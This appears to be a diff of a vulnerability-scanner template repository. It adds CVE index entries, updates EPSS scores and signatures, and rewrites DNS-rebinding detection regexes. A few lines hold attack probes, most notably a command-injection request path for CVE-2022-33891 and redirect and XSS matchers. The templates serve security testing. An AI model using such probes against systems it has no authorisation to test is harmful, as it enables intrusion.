 {"ID":"CVE-2023-6831","Info":{"Name":"mlflow - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-6831.yaml"}
 {"ID":"CVE-2023-6875","Info":{"Name":"WordPress POST SMTP Mailer \u003c= 2.8.7 - Authorization Bypass","Severity":"critical","Description":"The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6875.yaml"}
+{"ID":"CVE-2023-6895","Info":{"Name":"Hikvision Intercom Broadcasting System - Command Execution","Severity":"critical","Description":"Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"}
 {"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"}
 {"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"}
 {"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"}
 {"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"}
+{"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"}
 {"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"}
 {"ID":"CVE-2024-0713","Info":{"Name":"Monitorr Services Configuration - Arbitrary File Upload","Severity":"high","Description":"A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-0713.yaml"}
 {"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"medium","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"}
 {"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"high","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"}
+{"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"}
 {"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"}
 {"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"}
 {"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"}
@@ -2298,6 +2303,7 @@
 {"ID":"CVE-2024-22024","Info":{"Name":"Ivanti Connect Secure - XXE","Severity":"high","Description":"Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-22024.yaml"}
 {"ID":"CVE-2024-22319","Info":{"Name":"IBM Operational Decision Manager - JNDI Injection","Severity":"critical","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API.  IBM X-Force ID:  279145.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-22319.yaml"}
 {"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM.  IBM X-Force ID:  279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"}
+{"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"}
 {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
 {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
 {"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"}

cves.json-checksum.txt

@@ -1 +1 @@
-eb2a2554dd005ef35adf0ff115ae4913
+d1c0809e63305403ca431401cfcebe07

dns/dns-rebinding.yaml

@@ -1,5 +1,4 @@
 id: dns-rebinding
-
 info:
   name: DNS Rebinding Attack
   author: ricardomaia
@@ -10,6 +9,8 @@ info:
     - https://capec.mitre.org/data/definitions/275.html
     - https://payatu.com/blog/dns-rebinding/
     - https://heimdalsecurity.com/blog/dns-rebinding/
+  metadata:
+    max-request: 2
   tags: redirect,dns,network
 
 dns:
@@ -20,7 +21,7 @@ dns:
       - type: regex
         part: answer
         regex:
-          - 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$'
+          - 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$'
 
     extractors:
       - type: regex
@@ -28,35 +29,22 @@ dns:
         name: IPv4
         group: 1
         regex:
-          - 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})'
+          - 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})'
 
   - name: "{{FQDN}}"
     type: AAAA
     matchers:
-      # IPv6 Compressed
+      # IPv6 Compressed and Full
       - type: regex
         part: answer
         regex:
-          - "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$"
+          - "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})"
-
-      # IPv6
-      - type: regex
-        part: answer
-        regex:
-          - "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$"
 
     extractors:
       - type: regex
         part: answer
-        name: IPv6_Compressed
+        name: IPv6_ULA
         group: 1
         regex:
-          - "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$"
+          - "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})"
-
+# digest: 4b0a00483046022100f31fd9369022bcafe6da846b246069391f1c22137b8024bb71905634ffa56673022100ea3679256b9518c8853b42432e216d4da6ff3e88ebee349b67e8e8ba7d8a13e1:922c64590222798bb761d5b6d8e72950
-      - type: regex
-        part: answer
-        name: IPv6
-        group: 1
-        regex:
-          - "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$"
-# digest: 4a0a004730450221009a895344f0f4bf8d0444566a7a2392d2074708d88d29a0922ebb71935290785702200a338fe1517c225d45750b08f80f3a903cd5925a32c542b5559f0202173732be:922c64590222798bb761d5b6d8e72950

file/keys/linkedin-id.yaml

@@ -1,4 +1,4 @@
-id: linkedin-client-id
+id: linkedin-id
 
 info:
   name: Linkedin Client ID

headless/cves/2018/CVE-2018-25031.yaml

@@ -20,7 +20,7 @@ info:
     cve-id: CVE-2018-25031
     cwe-id: CWE-20
     epss-score: 0.00265
-    epss-percentile: 0.64105
+    epss-percentile: 0.65414
     cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
   metadata:
     verified: true
@@ -30,7 +30,6 @@ info:
     shodan-query: http.component:"Swagger"
     fofa-query: icon_hash="-1180440057"
   tags: headless,cve,cve2018,swagger,xss,smartbear
-
 headless:
   - steps:
       - args:
@@ -71,4 +70,4 @@ headless:
         words:
           - "swagger"
         case-insensitive: true
-# digest: 4a0a00473045022013f081ac9ee7ec2705ebf232439f9b18c17b162f4e3bfc4485638f324af817df022100e3e262210320011237b59f2a16f32a64e4ad8aba204a3c0f23a4ecda48368644:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220276c4920b8b15fde2802ab2d829106243bfa1d1b5eec02e3ea13925bb1a2367f022012c9b9cb6e5b2906f68da10c6d0aa5c7462f847f906fc82ae576ac26db37fbbb:922c64590222798bb761d5b6d8e72950

http/cves/2014/CVE-2014-6271.yaml

@@ -20,8 +20,8 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2014-6271
     cwe-id: CWE-78
-    epss-score: 0.97564
+    epss-score: 0.97559
-    epss-percentile: 0.99999
+    epss-percentile: 0.99997
     cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*
   metadata:
     max-request: 8
@@ -58,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203c32ed699b5b5784b8f6eddd60a3c06b1a1c8dbefd3024f425307f8f793e0f64022100e4987775a712348ab69dbb368677664e21d2d753a3ba22ab15c2dcd0d426cf49:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022022d9c0adae74cdc979a9807c7b6c229b34bbaf77fdf9fb5edbd4263a3e3d939d022100bff54d932fc7f8bc11b979b2289b87a588833b45578f1945d5e8dc9a7021354b:922c64590222798bb761d5b6d8e72950

http/cves/2014/CVE-2014-8799.yaml

@@ -21,7 +21,7 @@ info:
     cve-id: CVE-2014-8799
     cwe-id: CWE-22
     epss-score: 0.17844
-    epss-percentile: 0.95686
+    epss-percentile: 0.96002
     cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:*
   metadata:
     max-request: 1
@@ -50,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502206a7436cc97bf8ecebcb667d7af15dcf23669c6fe4558d8041af31eb305bc605e022100f724c31ae974833f30f077f071146f044c59dd077af802bcc254aaa7e7f82ee2:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100c44ca338e0e27aef8473eed734aaf201ffdbd8635955e4b8e4cbfb37f596bd5802202fa69ab04ca34891ed8896145cbd8e1af1443228c1e766e1cc8f6591c0e74f45:922c64590222798bb761d5b6d8e72950

http/cves/2018/CVE-2018-17431.yaml

@@ -20,8 +20,8 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2018-17431
     cwe-id: CWE-287
-    epss-score: 0.11315
+    epss-score: 0.11416
-    epss-percentile: 0.94677
+    epss-percentile: 0.95073
     cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:*
   metadata:
     max-request: 2
@@ -50,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502206e56a0d536dfc8d4ed10ae0505f2d2548b6c986854d0813c6e8185acc66756d9022100e74e57bbb9b04d2860f174d0f9effbef03a265a0ada954ea317f3fffa89a12ca:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100b58e1f2764198a04cdc831884ce49a67189b6a1988fcf7e27f9d82ed83cd2a3402206c36044d3ad9e30032c1e67d471ee256bb7602b09812ffc7830995d5808c7ff1:922c64590222798bb761d5b6d8e72950

http/cves/2018/CVE-2018-20463.yaml

@@ -15,13 +15,14 @@ info:
     - https://wordpress.org/plugins/jsmol2wp/
     - https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt
     - https://nvd.nist.gov/vuln/detail/CVE-2018-20463
+    - https://github.com/ARPSyndicate/cvemon
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-20463
     cwe-id: CWE-22
     epss-score: 0.01939
-    epss-percentile: 0.87393
+    epss-percentile: 0.88289
     cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:*
   metadata:
     verified: true
@@ -53,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502205f9aeadd874f5fdf363e87acc0ec34f995e53677d28cbc33b27cf113d9de2b03022100c5b000d74f0180cb372d2dd355622f03e7cb2b5180ac3cb0e6f0660049f49dba:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a004830460221008b0f6a4e144ec0a4f5fb0f772930b5da535472e941723be6c675589ac426a8b5022100bef4cc125a636184009e644aeb5fa64c4a868c49d7c081e63409ed228515e3ed:922c64590222798bb761d5b6d8e72950

http/cves/2020/CVE-2020-24223.yaml

@@ -20,8 +20,8 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2020-24223
     cwe-id: CWE-79
-    epss-score: 0.00976
+    epss-score: 0.0069
-    epss-percentile: 0.81758
+    epss-percentile: 0.79602
     cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*
   metadata:
     max-request: 1
@@ -49,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c973b82339421ec3089eac4ceee54851fb8db56c023e4110994b8c16b279307f022100ba5f5c61a9f8acb6755ba89ca34bb684ee60ac4e1e7c96f40f0688789b22e49a:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502203465eb756d9c1c2a642192e678566a419006885438b5721b7a8b54470650a994022100a3b09f8d55baad75a18b6eb7fab36fd7cf976201304457c717358dd7b6fa2862:922c64590222798bb761d5b6d8e72950

http/cves/2021/CVE-2021-21805.yaml

@@ -14,13 +14,15 @@ info:
     - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805
     - https://nvd.nist.gov/vuln/detail/CVE-2021-21805
+    - https://github.com/ARPSyndicate/cvemon
+    - https://github.com/ARPSyndicate/kenzer-templates
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-21805
     cwe-id: CWE-78
     epss-score: 0.97374
-    epss-percentile: 0.99892
+    epss-percentile: 0.99895
     cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*
   metadata:
     verified: true
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f2a3e97b98df27aafb1f8001f577c595d1cbb4fed075db594314502fbf283bd602204b4e9e0d429dacbd3c7672f6fd16118bbc7e73d54077c27d333a19e89ac0f5db:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220239da739e577f078def3474254759fb447a0e1c7ae5e5c894fc15f3748b3752b022039afb1da09e145478b68a7981ab742ece2729a5f473a12d97e7c259b4bddafb6:922c64590222798bb761d5b6d8e72950

http/cves/2021/CVE-2021-22873.yaml

@@ -21,7 +21,7 @@ info:
     cve-id: CVE-2021-22873
     cwe-id: CWE-601
     epss-score: 0.00922
-    epss-percentile: 0.81209
+    epss-percentile: 0.82474
     cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*
   metadata:
     verified: true
@@ -49,4 +49,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 490a0046304402206825e5ab8251fc139a7b9f7ac5b06687ca56ae1e65ed767ca11c20c7930c7e1f02205a2f6d3c6d66a885a07cd69568accc9951b72dc883ed9cc1f62f561083da2e0c:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502201f562b389b6a5f97abaafe839123249c8bfc49d20d8cc12c06a61ee23b840795022100e4d6049c15f40c1564d2e55b52873ca91a7030a85feb7605ebf54ce291e513d5:922c64590222798bb761d5b6d8e72950

http/cves/2021/CVE-2021-24849.yaml

@@ -6,26 +6,26 @@ info:
   severity: critical
   description: |
     The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
-  remediation: Fixed in 3.4.12
   reference:
     - https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24849
     - https://wordpress.org/plugins/wc-multivendor-marketplace/
+  remediation: Fixed in 3.4.12
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-24849
     cwe-id: CWE-89
+    cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
     epss-score: 0.00199
     epss-percentile: 0.56492
-    cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
   metadata:
-    verified: true
+    product: "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible"
-    max-request: 1
-    vendor: wclovers
-    product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible
     framework: wordpress
     publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
+    verified: true
+    max-request: 3
+    vendor: wclovers
   tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,wpscan,sqli
 
 flow: http(1) && http(2)
@@ -67,4 +67,4 @@ http:
           - 'contains(header, "application/json")'
           - 'contains(body, "success")'
         condition: and
-# digest: 4a0a00473045022100ac9faa851954e06269fcb6c1d2c78475a2f575683ef8f476b96450a5671b359102205d7f4ea4de3b3c6db211c706adcd4be8f13de39a9098990f182b0f2008efc79a:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100ef54cd087054515b6ef2f1935d258ecea55b3abf384cd95798b8cd351a5f1fe90220070a59d1e5a3ab49e8fc248e2ddc238e33958d75f7b3cfc5700b5018b8116f82:922c64590222798bb761d5b6d8e72950

http/cves/2021/CVE-2021-40651.yaml

@@ -18,8 +18,8 @@ info:
     cwe-id: CWE-22
     cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*
   metadata:
-    max-request: 1
+    shodan-query: "title:\"openSIS\""
-    shodan-query: title:"openSIS"
+    max-request: 2
   tags: cve,cve2021,lfi,os4ed,opensis,authenticated
 
 http:
@@ -42,4 +42,4 @@ http:
           - 'contains(body_1, "openSIS")'
           - "status_code == 200"
         condition: and
-# digest: 490a004630440220206394b303ab92ce65590e2c61e6eb5e9914219a5a0651ae69009a3f224109ff02207e729d1c062d3bd2e445a39a036992cc281564407a764e7f7ced5f02879f1034:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100924b4c785059886c8131bde539e1106c1be30952a7fea88bd992cb9cc3e7aca202204c4c3c880b323df6c23378c766e00dd0222716aa49f384cbc8f4c37b7c9ab38f:922c64590222798bb761d5b6d8e72950

http/cves/2022/CVE-2022-0776.yaml

@@ -21,7 +21,7 @@ info:
     cve-id: CVE-2022-0776
     cwe-id: CWE-79
     epss-score: 0.001
-    epss-percentile: 0.40832
+    epss-percentile: 0.40075
     cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:*
   metadata:
     vendor: revealjs
@@ -48,4 +48,4 @@ headless:
         part: extract
         words:
           - "true"
-# digest: 4a0a00473045022015776ab1f8ee5f7cbd078059bc34167a0b8ca0a11a1bda34723f7ec03d31b6c302210098d1c6a54ecbafb3158390aea2498590fe70df9d78d3266d388274859a641533:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100822f5151d594a59ff99bde533919eb403ddd05ab8d041ea5963a1c88f81d84320221008c8e17c078665f80ff1f6815e2f071996a8d9e4712b43e3bf775f0c2db3e0e12:922c64590222798bb761d5b6d8e72950

http/cves/2022/CVE-2022-26263.yaml

@@ -22,7 +22,7 @@ info:
     cve-id: CVE-2022-26263
     cwe-id: CWE-79
     epss-score: 0.00147
-    epss-percentile: 0.50638
+    epss-percentile: 0.49633
     cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:*
   metadata:
     verified: true
@@ -43,4 +43,4 @@ headless:
           - '<frame src="javascript:console.log(document.domain)"'
           - 'webhelp4.js'
         condition: and
-# digest: 4a0a00473045022100a72f95b8648b73eb2e4cf2ea58e09902bdd87b68ed16d6258763f77029657162022064b391ae3ee631c189007bc15526ede89c3be32159ec215d129a1840544b297e:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100c124eb614790888649b3ad794123f8a4d5127efb6b3dfcccc25a1431ae2dd660022100bdd24ef15743a8543fc37ed7a7e4a0399762873c6016d5cd6a811baa514a747d:922c64590222798bb761d5b6d8e72950

http/cves/2022/CVE-2022-30776.yaml

@@ -22,7 +22,7 @@ info:
     cve-id: CVE-2022-30776
     cwe-id: CWE-79
     epss-score: 0.00112
-    epss-percentile: 0.44504
+    epss-percentile: 0.43631
     cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:*
   metadata:
     verified: true
@@ -52,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203171cb9a5a9125732f06bba74b71efc2e09ae7c92ad33bcca6e6356b5d541fe702210081422e4791a4a926b08807deffab9bf4cb8eab98c0f9897922d586b01218bf06:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502210098e7e92637618d4c3c5540938565842f9d2479c1b7a7ca9a9333b2e0bf64a29b022077e0d1d54bd671842a9ba69fdbad1ed67e8c6f085c3235fde69b2d9e18009833:922c64590222798bb761d5b6d8e72950

http/cves/2022/CVE-2022-33891.yaml

@@ -37,7 +37,7 @@ variables:
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/doAs?=`{{url_encode("{{command}}")}}`'
+      - '{{BaseURL}}/?doAs=`{{url_encode("{{command}}")}}`'
 
     matchers-condition: and
     matchers:
@@ -45,4 +45,4 @@ http:
         part: body
         words:
           - "19833-2202-EVC"
-# digest: 4a0a004730450221008bb8dca83860e99f6649206e34e12203a4ef600bbafcd7ae6b135b537faab9990220205c3ed10d667efd9a2e7f2128c855334fab697f0bf55bf5792362c774f88c91:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100c1235eac532c6d726073650001ee75a510e3d2b869c6174b06e4a249f1d236090220564440e9e87fc5f90b25cfc4108c5aa04b592bc0e6c584c01fec85b312622f08:922c64590222798bb761d5b6d8e72950

http/cves/2022/CVE-2022-38131.yaml

@@ -6,28 +6,29 @@ info:
   severity: medium
   description: |
     RStudio Connect prior to 2023.01.0 is affected by an Open Redirect issue. The vulnerability could allow an attacker to redirect users to malicious websites.
-  impact: |
-    An attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.
-  remediation: |
-    This issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.
   reference:
     - https://tenable.com/security/research/tra-2022-30
